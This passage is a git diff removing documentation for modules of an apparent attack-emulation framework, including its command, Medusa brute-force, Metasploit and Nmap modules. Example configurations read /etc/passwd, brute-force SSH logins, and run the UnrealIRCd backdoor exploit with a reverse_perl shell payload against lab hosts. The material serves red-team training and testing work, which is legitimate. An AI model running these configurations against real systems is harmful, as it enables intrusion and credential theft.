"value2" -} - -validate_output = validate(args) -print(f"validate output: {validate_output}") - -execute_output = execute(args) -print(f"execute output: {execute_output}") - - -``` diff --git a/docs/2022.2/modules/mod_cmd.md b/docs/2022.2/modules/mod_cmd.md deleted file mode 100644 index b731416030e40e29d6238490f833f29e0853b662..0000000000000000000000000000000000000000 --- a/docs/2022.2/modules/mod_cmd.md +++ /dev/null @@ -1,70 +0,0 @@ -# mod_cmd - -Module for running shell commands (depending on the shell used). When specifying "use_session" or "use_named_session", the command will be executed in the respective sessions context. - -## System requirements - -There are no system requirements. - -### For use with sessions only - -For this module to function properly, [Metasploit-framework](https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers) needs to be installed. - -After a successful installation of Metasploit-framework, you need to load msgrpc plugin. Easiest way to do this to open your terminal and run `msfrpcd` with `-P toor` to use password and `-S` to turn off SSL (depending on configuration in Worker config file). - -**Optional:** - -Another option is to run Metasploit using `msfconsole` and load msgrpc plugin using this command: - -````bash -load msgrpc ServerHost=127.0.0.1 ServerPort=55553 User=msf Pass='toor' SSL=true -```` - -This is just default, feel free to change the parameters to suit your needs, but keep in mind that they must match your worker config file. - -After successfully loading the msgrpc plugin, you are all set and ready to use this module. - - -## Input parameters - -Description of input parameters for module. - -| Parameter name | Required | Example value | Data type | Default value | Parameter description | -|---------------------|----------|-----------------|-----------|---------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| `cmd` | Yes | cat /etc/passwd | string | - | The command for execution. | -| `end_checks` | No | \[root, admin\] | list | - | List of strings that are checked regularly to determine whether the command execution finished. It can also be used, for example, to make sure that the script has run completely, if you put a string at the end of it, which you will then check using this parameter. | -| `session_id` | No | 1 | int | - | Msf session in which the command should be executed. | -| `timeout` | No | 60 | int | - | Timeout for the command **in seconds** | -| `serialized_output` | No | true | string | false | Flag whether you want to return the result of the command in `serialized_output`, so that it could be used as input in other modules. **NOTICE: output of the command muse be valid JSON with this option enabled.** | - -**NOTICE: This module can use existing sessions with our [Cryton session management](https://cryton.gitlab-pages.ics.muni.cz/cryton-project/1.0/scenario/#session-management) feature.** - -### Example yaml(s) - -```yaml -module_arguments: - cmd: cat /etc/passwd; echo end_check_string - end_checks: - - end_check_string - session_id: 1 -``` - -## Output - -Description of module output. - -| Parameter name | Parameter description | -|---------------------|----------------------------------------------------------------------------------| -| `return_code` | 0 - success<br />-1 - fail | -| `output` | Raw output from the command or any errors that can occur during module execution | -| `serialized_output` | Serialized script output in JSON that can accessed in other modules as input | - -### Example - -```json lines -{ - 'return_code': 0, - 'output': 'contents of passwd file on target', - 'serialized_output': None -} -``` \ No newline at end of file diff --git a/docs/2022.2/modules/mod_medusa.md b/docs/2022.2/modules/mod_medusa.md deleted file mode 100644 index 25c0051bf7f6f3b751294e7685a7382c2ff52f68..0000000000000000000000000000000000000000 --- a/docs/2022.2/modules/mod_medusa.md +++ /dev/null @@ -1,97 +0,0 @@ -# mod_medusa - -This module implements attacking capabilities of Medusa bruteforce tool. - -## System requirements - -System requirements (those not listed in requirements.txt for python). - -For this module to function properly, [Medusa](https://www.kali.org/tools/medusa/) needs to be installed. - -## Input parameters - -Description of input parameters for module. - -### Parameters with predefined inputs - -| Parameter name | Required | Example value | Data type | Default value | Parameter description | -|----------------|----------|---------------|-----------|---------------|----------------------------------------------------------------| -| `target` | Yes | 127.0.0.1 | string | - | Bruteforce target. | -| `mod` | No | ftp | string | ssh | Specified mod(service) you want to use to attack. | -| `raw_output` | No | false | bool | true | Flag whether you want to return raw output from Medusa. | -| `credentials` | No | false | dict | - | Parameters that can be used under this key are in table below. | -| `tasks` | No | false | int | 4 | Total number of login pairs to be tested concurrently. | - - -Parameters that can be used under `credentials`. - -| Parameter name | Parameter description | -|-----------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| `username` | Username to use for bruteforce | -| `password` | Password to use for bruteforce | -| `username_list` | Absolute path to file with usernames (default is username wordlist in mod folder) | -| `password_list` | Absolute path to file with passwords (default is password wordlist in mod folder) | -| `combo_list` | Absolute path to file with login pairs - user:password (official format can be found in http://foofus.net/goons/jmk/medusa/medusa.html). **Cannot be combined with other input parameters under `credentials`!** | - -### Parameters with custom Medusa command - -| Parameter name | Parameter description | -|----------------|-----------------------------------------------------------------------------------------------------| -| `command` | Medusa command with syntax as in command line. **Cannot be combined with other input parameters!** | - -## Example yaml(s) - -### Example with predefined inputs -```yaml -module_arguments: - target: CHANGE ME - raw_output: true - credentials: - username: vagrant - password: vagrant - tasks: 4 -``` - -```yaml -module_arguments: - target: CHANGE ME - credentials: - combo_list: absolute/path/to/file - tasks: 4 -``` - -### Example with custom command -```yaml -module_arguments: - command: medusa -t 4 -u vagrant -p vagrant -h <target> -M ssh -``` - -## Output - -Description of module output. - -| Parameter name | Parameter description | -|---------------------|-------------------------------------------------------------------------------| -| `return_code` | 0 - success<br />-1 - fail | -| `output` | Raw output from Medusa or any errors that can occur during module execution. | -| `serialized_output` | Serialized Medusa output to JSON that can accessed in other modules as input. | - -### serialized_output - -Description of `serialized_output` output parameter - -| Parameter name | Parameter description | -|-------------------|--------------------------------------------------------------------------| -| `username` | First username found during bruteforce. | -| `password` | First password found during bruteforce. | -| `all_credentials` | List of dictionaries containing all the credentials found in bruteforce. | - -### Example - -```json lines -{ - 'return_code': 0, - 'output': 'Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>\n\nACCOUNT CHECK: [ssh] Host: 192.168.56.3 (1 of 1, 0 complete) User: vagrant (1 of 1, 0 complete) Password: vagrant (1 of 1 complete)\nACCOUNT FOUND: [ssh] Host: 192.168.56.3 User: vagrant Password: vagrant [SUCCESS]\n', - 'serialized_output': {'username': 'vagrant', 'password': 'vagrant', 'all_credentials': [{'username': 'vagrant', 'password': 'vagrant'}]} -} -``` \ No newline at end of file diff --git a/docs/2022.2/modules/mod_msf.md b/docs/2022.2/modules/mod_msf.md deleted file mode 100644 index eb6add1e942675f19ab801efeba1b19430b42a34..0000000000000000000000000000000000000000 --- a/docs/2022.2/modules/mod_msf.md +++ /dev/null @@ -1,90 +0,0 @@ -# mod_msf - -Module for orchestrating Metasploit Framework. - -## System requirements - -For this module to function properly, [Metasploit-framework](https://www.kali.org/tools/metasploit-framework/) needs to be installed. - -After a successful installation of Metasploit-framework, you need to load MSFRPCD plugin. Easiest way to do this to open your terminal and run `msfrpcd` with `-P toor` to use password and `-S` to turn off SSL (depending on configuration in Worker config file). - -**Optional:** - -Another option is to run Metasploit using `msfconsole` and load msgrpc plugin using this command: - -````bash -load msgrpc ServerHost=127.0.0.1 ServerPort=55553 User=msf Pass='toor' SSL=true -```` - -This is just default, feel free to change the parameters to suit your needs, but keep in mind that they must match your worker config file. - -After successfully loading the msgrpc plugin, you are all set and ready to use this module. - -## Input parameters - -Description of input parameters for module. - -| Parameter name | Required | Example value | Data type | Default value | Parameter description | -|-------------------|-----------------------------------------|------------------------------------|-----------|----------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| `target` | No | 127.0.0.1 | string | default value is taken from Non-case sensitive `RHOSTS` or `RHOST` option in `module_optons` | IP address of the target for matching metasploit session purposes. | -| `module_type` | Yes | exploit | string | - | Type of the msf module (valid values: `exploit`, `post`, `encoder`, `auxiliary`, `nop`, `payload`). | -| `module` | Yes | unix/irc/unreal_ircd_3281_backdoor | string | - | Name of metasploit module. | -| `module_options` | Yes | {"RHOSTS": "127.0.0.1"} | dict | - | Custom dictionary with options for the given module | -| `payload` | Yes (only for `module_type`: `exploit`) | cmd/unix/reverse_perl | string | - | Name of the payload to use in combination with the given module. | -| `payload_options` | Yes (only with defined `payload`) | {"LHOST": "127.0.0.1"} | dict | - | Custom dictionary with options for the given payload. | -| `raw_output` | No | false | bool | true | Flag whether you want to return raw output from Metasploit. | -| `wait_for_result` | No | false | bool | true | Boolean value (True or False) whether the module should be executed as background job. If False the module is executed without waiting for the job to finish. Be aware, that then the console output of the module's execution may not be fully captured. If this option is set to True, then the module waits until the job is completed and the output of the module is fully captured. | -| `module_timeout` | No | 120 | int | 60 | Number of seconds to wait before the module execution will be terminated. | -| `module_retries` | No | 3 | int | 1 | Defines how many times should metasploit module try to be executed, if it didn't finish successfully until the `module_timeout`is reached. | - - -**NOTICE: This module can use existing sessions with our [Cryton session management](https://cryton.gitlab-pages.ics.muni.cz/cryton-project/1.0/scenario/#session-management) feature.** - -### Example with payload - -```yaml -module_arguments: - module_type: exploit - module: unix/irc/unreal_ircd_3281_backdoor - module_options: - RHOSTS: CHANGE ME - RPORT: 6697 - payload: cmd/unix/reverse_perl - payload_options: - LHOST: 172.28.128.3 - LPORT: 4444 - exploit_timeout_in_sec: 15 - exploit_retries: 5 -``` - -### Example without payload - -```yaml -module_arguments: - module_type: auxiliary - module: scanner/ssh/ssh_login - module_options: - RHOSTS: CHANGE ME - USERNAME: vagrant - PASSWORD: vagrant -``` - -## Output - -Description of module output. - -| Parameter name | Parameter description | -|---------------------|---------------------------------------------------------------------------------------------------------------| -| `return_code` | 0 - success<br />-1 - fail | -| `output` | Raw output from Metasploit or any errors that can occur during module execution. | -| `serialized_output` | **Only available when the metasploit module creates a session.** Dictionary in form of `{'session_id': '1'}`. | - -### Example -```json lines -{ - 'return_code': 0, - 'output': "VERBOSE => True\nBRUTEFORCE_SPEED => 5\nBLANK_PASSWORDS => false\nUSER_AS_PASS => false\nDB_ALL_CREDS => false\nDB_ALL_USERS => false\nDB_ALL_PASS => false\nDB_SKIP_EXISTING => none\nSTOP_ON_SUCCESS => false\nREMOVE_USER_FILE => false\nREMOVE_PASS_FILE => false\nREMOVE_USERPASS_FILE => false\nTRANSITION_DELAY => 0\nMaxGuessesPerService => 0\nMaxMinutesPerService => 0\nMaxGuessesPerUser => 0\nCreateSession => true\nAutoVerifySession => true\nTHREADS => 1\nShowProgress => true\nShowProgressPercent => 10\nRPORT => 22\nSSH_IDENT => SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3\nSSH_TIMEOUT => 30\nSSH_DEBUG => false\nGatherProof => true\nRHOSTS => 192.168.56.51\nUSERNAME => vagrant\nPASSWORD => vagrant\nDisablePayloadHandler => True\n[*] 192.168.56.51:22 - Starting bruteforce\n[+] 192.168.56.51:22 - Success: 'vagrant:vagrant' 'uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant) Linux vagrant-ubuntu-trusty-64 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux '\n[!] No active DB -- Credential data will not be saved!\n[*] SSH session 1 opened (192.168.56.50:36169 -> 192.168.56.51:22) at 2022-08-04 17:03:56 +0200\n[*] Scanned 1 of 1 hosts (100% complete)\n[*] Auxiliary module execution completed\n", - 'serialized_output': {'session_id': '1'} -} - -``` \ No newline at end of file diff --git a/docs/2022.2/modules/mod_nmap.md b/docs/2022.2/modules/mod_nmap.md deleted file mode 100644 index acfad8ee6825d70073c26e535ee58fe2cffe329f..0000000000000000000000000000000000000000 --- a/docs/2022.2/modules/mod_nmap.md +++ /dev/null @@ -1,119 +0,0 @@ -# mod_nmap - -This module implements scanning capabilities of Nmap. - -It is scanning target's ports. By default, it scans the most common ports and returns a list with all ports and their parameters. - -## System requirements - -For this module to function properly, [Nmap](https://www.kali.org/tools/nmap/) needs to be installed. - -## Input parameters - -Description of input parameters for module. - -### Parameters with predefined inputs - -| Parameter name | Required | Example value | Data type | Default value | Parameter description | -|-------------------|----------|----------------------------------------------------------|-----------|----------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------| -| `target` | Yes | 127.0.0.1 | string | - | Scan target. | -| `ports` | No | [1-300, 443] | array | scans top 100 common ports (--top-ports 100) | List of individual ports or range of ports to be scanned. | -| `port_parameters` | No | all the possible parameters are [here](#port-parameters) | dict | - | Check if found ports match your desired parameters. If the port with desired parameters is not found, the module will result in failure (`return_code: -1`). | -| `options` | No | -T4 -sV | string | - | Additional Nmap parameters. | -| `raw_output` | No | false | bool | true | Flag whether you want to return raw output from Nmap scan. | -| `timeout` | No | 30 | int | 60 | Timeout for nmap scan | - - -### Parameters with custom nmap command - -| Parameter name | Required | Example value | Data type | Default value | Parameter description | -|---------------------|----------|----------------------------------------------------------|-----------|---------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------| -| `command` | Yes | nmap -T4 127.0.0.1 | string | - | Custom nmap command like in command line. | -| `serialized_output` | No | false | bool | true | Option to serialize raw output to JSON, this option will add `-oX -` parameter to the command(if not already there) for xml output needed for serialization. | -| `port_parameters` | No | all the possible parameters are [here](#port-parameters) | dict | - | Check if found ports match your desired parameters. If the port with desired parameters is not found, the module will result in failure (`return_code: -1`). | -| `raw_output` | No | false | bool | true | Flag whether you want to return raw output from Nmap scan. | -| `timeout` | No | 30 | int | 60 | Timeout for nmap scan | - - -### Port parameters -Example of all possible options for `port_parameters`. -```yaml ---- -protocol: tcp -portid: '22' -state: open -reason: syn-ack -reason_ttl: '0' -service: - name: ssh - product: OpenSSH - version: 6.6.1p1 Ubuntu 2ubuntu2.13 - extrainfo: Ubuntu Linux; protocol 2.0 - ostype: Linux - method: probed - conf: '10' -cpe: -- cpe:/a:openbsd:openssh:6.6.1p1 -- cpe:/o:linux:linux_kernel -scripts: [] -``` -All options try to find string in the nmap serialized output, and they are non-case sensitive. For example if the `cpe` in the nmap output would be cpe:/o:linux:linux_kernel, `cpe: -linux` in `port_parameters` would match it successfully. - -## Output parameters - -Description of module output. - -| Parameter name | Parameter description | -|---------------------|-------------------------------------------------------------------------------| -| `return_code` | 0 - success<br />-1 - fail | -| `output` | Raw output of Nmap scan or any errors that can occur during module execution. | -| `serialized_output` | Serialized Nmap output in JSON that can accessed in other modules as input. | - -## Example yaml(s) with their outputs - -### Example with predefined inputs -```yaml -module_arguments: - target: CHANGE ME - ports: - - 1-30 - - 80 - port_parameters: - - protocol: tcp - portid: '80' - state: open - reason: syn-ack - reason_ttl: '0' - service: - name: http - product: Apache httpd - version: 2.4.7 - method: probed - conf: '10' - cpe: - - apache - options: -T4 -sV -``` - -```json lines -{ - 'return_code': 0, - 'serialized_output': {'192.168.56.3': {'osmatch': {}, 'ports': [{'protocol': 'tcp', 'portid': '21', 'state': 'open', 'reason': 'syn-ack', 'reason_ttl': '0', 'service': {'name': 'ftp', 'product': 'ProFTPD', 'version': '1.3.5', 'ostype': 'Unix', 'method': 'probed', 'conf': '10'}, 'cpe': [{'cpe': 'cpe:/a:proftpd:proftpd:1.3.5'}], 'scripts': []}, {'protocol': 'tcp', 'portid': '22', 'state': 'open', 'reason': 'syn-ack', 'reason_ttl': '0', 'service': {'name': 'ssh', 'product': 'OpenSSH', 'version': '6.6.1p1 Ubuntu 2ubuntu2.13', 'extrainfo': 'Ubuntu Linux; protocol 2.0', 'ostype': 'Linux', 'method': 'probed', 'conf': '10'}, 'cpe': [{'cpe': 'cpe:/a:openbsd:openssh:6.6.1p1'}, {'cpe': 'cpe:/o:linux:linux_kernel'}], 'scripts': []}, {'protocol': 'tcp', 'portid': '80', 'state': 'open', 'reason': 'syn-ack', 'reason_ttl': '0', 'service': {'name': 'http', 'product': 'Apache httpd', 'version': '2.4.7', 'hostname': '127.0.2.1', 'method': 'probed', 'conf': '10'}, 'cpe': [{'cpe': 'cpe:/a:apache:http_server:2.4.7'}], 'scripts': []}], 'hostname': [], 'macaddress': None, 'state': {'state': 'up', 'reason': 'syn-ack', 'reason_ttl': '0'}}, 'stats': {'scanner': 'nmap', 'args': '/usr/bin/nmap -oX - -T4 -sV -p-29,80 192.168.56.3', 'start': '1660830754', 'startstr': 'Thu Aug 18 15:52:34 2022', 'version': '7.92', 'xmloutputversion': '1.05'}, 'runtime': {'time': '1660830775', 'timestr': 'Thu Aug 18 15:52:55 2022', 'summary': 'Nmap done at Thu Aug 18 15:52:55 2022; 1 IP address (1 host up) scanned in 21.05 seconds', 'elapsed': '21.05', 'exit': 'success'}}, - 'output': '<nmaprun scanner="nmap" args="/usr/bin/nmap -oX - -T4 -sV -p-29,80 192.168.56.3" start="1660830754" startstr="Thu Aug 18 15:52:34 2022" version="7.92" xmloutputversion="1.05">\n<scaninfo type="connect" protocol="tcp" numservices="30" services="1-29,80" />\n<verbose level="0" />\n<debugging level="0" />\n<hosthint><status state="up" reason="unknown-response" reason_ttl="0" />\n<address addr="192.168.56.3" addrtype="ipv4" />\n<hostnames>\n</hostnames>\n</hosthint>\n<host starttime="1660830767" endtime="1660830775"><status state="up" reason="syn-ack" reason_ttl="0" />\n<address addr="192.168.56.3" addrtype="ipv4" />\n<hostnames>\n</hostnames>\n<ports><extraports state="filtered" count="27">\n<extrareasons reason="no-response" count="27" proto="tcp" ports="1-20,23-29" />\n</extraports>\n<port protocol="tcp" portid="21"><state state="open" reason="syn-ack" reason_ttl="0" /><service name="ftp" product="ProFTPD" version="1.3.5" ostype="Unix" method="probed" conf="10"><cpe>cpe:/a:proftpd:proftpd:1.3.5</cpe></service></port>\n<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="0" /><service name="ssh" product="OpenSSH" version="6.6.1p1 Ubuntu 2ubuntu2.13" extrainfo="Ubuntu Linux; protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:6.6.1p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service></port>\n<port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="0" /><service name="http" product="Apache httpd" version="2.4.7" hostname="127.0.2.1" method="probed" conf="10"><cpe>cpe:/a:apache:http_server:2.4.7</cpe></service></port>\n</ports>\n<times srtt="464" rttvar="1667" to="100000" />\n</host>\n<runstats><finished time="1660830775" timestr="Thu Aug 18 15:52:55 2022" summary="Nmap done at Thu Aug 18 15:52:55 2022; 1 IP address (1 host up) scanned in 21.05 seconds" elapsed="21.05" exit="success" /><hosts up="1" down="0" total="1" />\n</runstats>\n</nmaprun>' -} -``` - -### Example with custom command -```yaml -module_arguments: - command: nmap -A -T4 --top-ports 100 <target> - timeout: 20 -``` - -```json lines -{ - 'return_code': 0, - 'serialized_output': {'192.168.56.51': {'osmatch': {}, 'ports': [{'protocol': 'tcp', 'portid': '22', 'state': 'open', 'reason': 'syn-ack', 'reason_ttl': '0', 'service': {'name': 'ssh', 'product': 'OpenSSH', 'version': '6.6.1p1 Ubuntu 2ubuntu2.13', 'extrainfo': 'Ubuntu Linux; protocol 2.0', 'ostype': 'Linux', 'method': 'probed', 'conf': '10'}, 'cpe': [{'cpe': 'cpe:/a:openbsd:openssh:6.6.1p1'}, {'cpe': 'cpe:/o:linux:linux_kernel'}], 'scripts': [{'name': 'ssh-hostkey', 'raw': '\n 1024 c7:23:04:56:47:12:29:44:cd:b5:47:f7:5a:cb:ad:6b (DSA)\n 2048 ab:d9:26:30:04:cd:99:ee:2c:f2:33:82:cd:2d:28:67 (RSA)\n 256 80:e7:ff:d4:4d:83:fb:e8:9f:69:27:68:bd:05:d4:2b (ECDSA)\n 256 61:36:ed:35:89:45:08:e0:85:da:45:05:9f:70:ed:15 (ED25519)', 'data': {'children': [{'fingerprint': 'c723045647122944cdb547f75acbad6b', 'type': 'ssh-dss', 'key': 'AAAAB3NzaC1kc3MAAACBAO9HtEJnY/fqKHmaAw+ycL4gHrICR7T/1JL5lpm0drDcrZtWI/mDhDiICba8yZlQrELAhnsP9yQf0AtRDiAA8zOqFw/55RdejvvUzWWUTI+5shisefPHbSRzHrJsO9khVR9gbDkirdGnOvjzi4qIHsqOPW6ji6/WhBWmjAKOWjr1AAAAFQDeFPBoAJqvJf+dPA1d3v+pH/VVpQAAAIEA3XepPB0Uo4M6J4UYCsX+Lu8SWujQ0AOSm9jQqmVQpD9sjnBWnAUP7ScUoSX1om7GadlZLMWT4GM3ljq3fQ+tNh/hejenJioTfnYY1BLlwpiqpNq9kU4JyF5vq1ZXdOPPKwJar52IDQf+p6M9fMtHrRgLVqXt5eHUWFDCiyxRi6kAAACBAL8lNl2BPKTyk66pGaKyUOBKw030K+2KPCdsupfzKS6oa5ZUWLSv2xToq0mKCLa+AcIr3yCS+q/v0oS85GawG56s5aQ9qNAlQbqDXqM/5TJx7xv57uDsZH5dNzyAEIM/+FjoiT6acQHFQ+DHRMrWwTuU3nHi5BF5k31/DflS8h+J', 'bits': '1024'}, {'fingerprint': 'abd9263004cd99ee2cf23382cd2d2867', 'type': 'ssh-rsa', 'key': 'AAAAB3NzaC1yc2EAAAADAQABAAABAQDjroBPHxLTl8UXL2r6HHW9Hcj+p2J4uUJh3k7ULVR8/aTRnJxyUfCPDway/lyoa2tY5qtiAF8k4tI53o7cCNnzL/aRW+w3PHIWGaYyI8VmNQxKKvQqcorML5UUaif9H3nTIN6+MIK+bxWMOnjq9vMnz4lzDYp6JX5Ra1LzflhmYHhnVVHA1JUuERp2MzN5OC3QJ+YaOCYYkbuY+GIn/SV+tcTbVXvpj6Dk3IQAQx1plQLbjcLda3wJjB+Umb+Xr/YkrKGvlWJTjc75I1+qIT4IJ1bKeecERHnT/IPpg8w7CDv3mHTlhW3fA9I3D3YElh21C/RFzwaGbOFP5q5pdunP', 'bits': '2048'}, {'fingerprint': '80e7ffd44d83fbe89f692768bd05d42b', 'type': 'ecdsa-sha2-nistp256', 'key': 'AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPkR0kyR7nNOBkue6qsy995GPdpnlnrsbDMkm/8lrx8dTkg+xg5exjZcQeATsNgMbzvwAcm4NXEMg3RNiLAJ4Zo=', 'bits': '256'}, {'fingerprint': '6136ed35894508e085da45059f70ed15', 'type': 'ssh-ed25519', 'key': 'AAAAC3NzaC1lZDI1NTE5AAAAIJIkt1AlQN1PvvvgH6AgQjroOF2iIYTC0QFqP0Kfx9bC', 'bits': '256'}]}}]}, {'protocol': 'tcp', 'portid': '111', 'state': 'open', 'reason': 'syn-ack', 'reason_ttl': '0', 'service': {'name': 'rpcbind', 'version': '2-4', 'extrainfo': 'RPC #100000', 'method': 'probed', 'conf': '10'}, 'cpe': [], 'scripts': [{'name': 'rpcinfo', 'raw': '\n program version port/proto service\n 100000 2,3,4 111/tcp rpcbind\n 100000 2,3,4 111/udp rpcbind\n 100000 3,4 111/tcp6 rpcbind\n 100000 3,4 111/udp6 rpcbind\n 100024 1 34829/tcp status\n 100024 1 35465/udp status\n 100024 1 38358/udp6 status\n 100024 1 41647/tcp6 status\n', 'data': {'100024': {'tcp6': {'version': {'children': [{0: '1'}]}, 'children': [{'port': '41647', 'owner': '107', 'addr': '::'}]}, 'udp': {'version': {'children': [{0: '1'}]}, 'children': [{'port': '35465', 'owner': '107', 'addr': '0.0.0.0'}]}, 'udp6': {'version': {'children': [{0: '1'}]}, 'children': [{'port': '38358', 'owner': '107', 'addr': '::'}]}, 'tcp': {'version': {'children': [{0: '1'}]}, 'children': [{'port': '34829', 'owner': '107', 'addr': '0.0.0.0'}]}}, '100000': {'udp': {'version': {'children': [{0: '2', 1: '3', 2: '4'}]}, 'children': [{'port': '111', 'owner': 'superuser', 'addr': '0.0.0.0'}]}, 'local': {'version': {'children': [{0: '3', 1: '4'}]}, 'children': [{'addr': '/run/rpcbind.sock', 'owner': 'superuser'}]}, 'tcp6': {'version': {'children': [{0: '3', 1: '4'}]}, 'children': [{'port': '111', 'owner': 'superuser', 'addr': '::'}]}, 'udp6': {'version': {'children': [{0: '3', 1: '4'}]}, 'children': [{'port': '111', 'owner': 'superuser', 'addr': '::'}]}, 'tcp': {'version': {'children': [{0: '2', 1: '3', 2: '4'}]}, 'children': [{'port': '111', 'owner': 'superuser', 'addr': '0.0.0.0'}]}}}}]}], 'hostname': [], 'macaddress': None, 'state': {'state': 'up', 'reason': 'conn-refused', 'reason_ttl': '0'}}, 'stats': {'scanner': 'nmap', 'args': 'nmap -oX - -A -T4 --top-ports 100 192.168.56.51', 'start': '1660741353', 'startstr': 'Wed Aug 17 15:02:33 2022', 'version': '7.92', 'xmloutputversion': '1.05'}, 'runtime': {'time': '1660741360', 'timestr': 'Wed Aug 17 15:02:40 2022', 'summary': 'Nmap done at Wed Aug 17 15:02:40 2022; 1 IP address (1 host up) scanned in 7.65 seconds', 'elapsed': '7.65', 'exit': 'success'}}, - 'output': '<?xml version="1.0" encoding="UTF-8"?>\n<!DOCTYPE nmaprun>\n<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>\n<!-- Nmap 7.92 scan initiated Wed Aug 17 15:02:33 2022 as: nmap -oX - -A -T4 --top-ports 100 192.168.56.51 -->\n<nmaprun scanner="nmap" args="nmap -oX - -A -T4 --top-ports 100 192.168.56.51" start="1660741353" startstr="Wed Aug 17 15:02:33 2022" version="7.92" xmloutputversion="1.05">\n<scaninfo type="connect" protocol="tcp" numservices="100" services="7,9,13,21-23,25-26,37,53,79-81,88,106,110-111,113,119,135,139,143-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,631,646,873,990,993,995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152-49157"/>\n<verbose level="0"/>\n<debugging level="0"/>\n<hosthint><status state="up" reason="unknown-response" reason_ttl="0"/>\n<address addr="192.168.56.51" addrtype="ipv4"/>\n<hostnames>\n</hostnames>\n</hosthint>\n<host starttime="1660741353" endtime="1660741360"><status state="up" reason="conn-refused" reason_ttl="0"/>\n<address addr="192.168.56.51" addrtype="ipv4"/>\n<hostnames>\n</hostnames>\n<ports><extraports state="closed" count="98">\n<extrareasons reason="conn-refused" count="98" proto="tcp" ports="7,9,13,21,23,25-26,37,53,79-81,88,106,110,113,119,135,139,143-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,631,646,873,990,993,995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152-49157"/>\n</extraports>\n<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="ssh" product="OpenSSH" version="6.6.1p1 Ubuntu 2ubuntu2.13" extrainfo="Ubuntu Linux; protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:6.6.1p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="ssh-hostkey" output="
 1024 c7:23:04:56:47:12:29:44:cd:b5:47:f7:5a:cb:ad:6b (DSA)
 2048 ab:d9:26:30:04:cd:99:ee:2c:f2:33:82:cd:2d:28:67 (RSA)
 256 80:e7:ff:d4:4d:83:fb:e8:9f:69:27:68:bd:05:d4:2b (ECDSA)
 256 61:36:ed:35:89:45:08:e0:85:da:45:05:9f:70:ed:15 (ED25519)"><table>\n<elem key="fingerprint">c723045647122944cdb547f75acbad6b</elem>\n<elem key="type">ssh-dss</elem>\n<elem key="key">AAAAB3NzaC1kc3MAAACBAO9HtEJnY/fqKHmaAw+ycL4gHrICR7T/1JL5lpm0drDcrZtWI/mDhDiICba8yZlQrELAhnsP9yQf0AtRDiAA8zOqFw/55RdejvvUzWWUTI+5shisefPHbSRzHrJsO9khVR9gbDkirdGnOvjzi4qIHsqOPW6ji6/WhBWmjAKOWjr1AAAAFQDeFPBoAJqvJf+dPA1d3v+pH/VVpQAAAIEA3XepPB0Uo4M6J4UYCsX+Lu8SWujQ0AOSm9jQqmVQpD9sjnBWnAUP7ScUoSX1om7GadlZLMWT4GM3ljq3fQ+tNh/hejenJioTfnYY1BLlwpiqpNq9kU4JyF5vq1ZXdOPPKwJar52IDQf+p6M9fMtHrRgLVqXt5eHUWFDCiyxRi6kAAACBAL8lNl2BPKTyk66pGaKyUOBKw030K+2KPCdsupfzKS6oa5ZUWLSv2xToq0mKCLa+AcIr3yCS+q/v0oS85GawG56s5aQ9qNAlQbqDXqM/5TJx7xv57uDsZH5dNzyAEIM/+FjoiT6acQHFQ+DHRMrWwTuU3nHi5BF5k31/DflS8h+J</elem>\n<elem key="bits">1024</elem>\n</table>\n<table>\n<elem key="fingerprint">abd9263004cd99ee2cf23382cd2d2867</elem>\n<elem key="type">ssh-rsa</elem>\n<elem key="key">AAAAB3NzaC1yc2EAAAADAQABAAABAQDjroBPHxLTl8UXL2r6HHW9Hcj+p2J4uUJh3k7ULVR8/aTRnJxyUfCPDway/lyoa2tY5qtiAF8k4tI53o7cCNnzL/aRW+w3PHIWGaYyI8VmNQxKKvQqcorML5UUaif9H3nTIN6+MIK+bxWMOnjq9vMnz4lzDYp6JX5Ra1LzflhmYHhnVVHA1JUuERp2MzN5OC3QJ+YaOCYYkbuY+GIn/SV+tcTbVXvpj6Dk3IQAQx1plQLbjcLda3wJjB+Umb+Xr/YkrKGvlWJTjc75I1+qIT4IJ1bKeecERHnT/IPpg8w7CDv3mHTlhW3fA9I3D3YElh21C/RFzwaGbOFP5q5pdunP</elem>\n<elem key="bits">2048</elem>\n</table>\n<table>\n<elem key="fingerprint">80e7ffd44d83fbe89f692768bd05d42b</elem>\n<elem key="type">ecdsa-sha2-nistp256</elem>\n<elem 